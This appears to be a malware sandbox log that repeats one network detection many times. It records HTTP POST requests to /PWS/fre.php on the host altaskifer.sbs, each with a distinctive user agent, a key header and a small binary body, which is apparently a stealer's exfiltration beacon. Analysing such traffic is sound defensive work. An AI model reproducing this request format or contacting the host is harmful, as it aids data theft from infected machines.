                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
                          Source: global trafficHTTP traffic detected: POST /PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: altaskifer.sbsAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2FD79934Content-Length: 161Connection: close
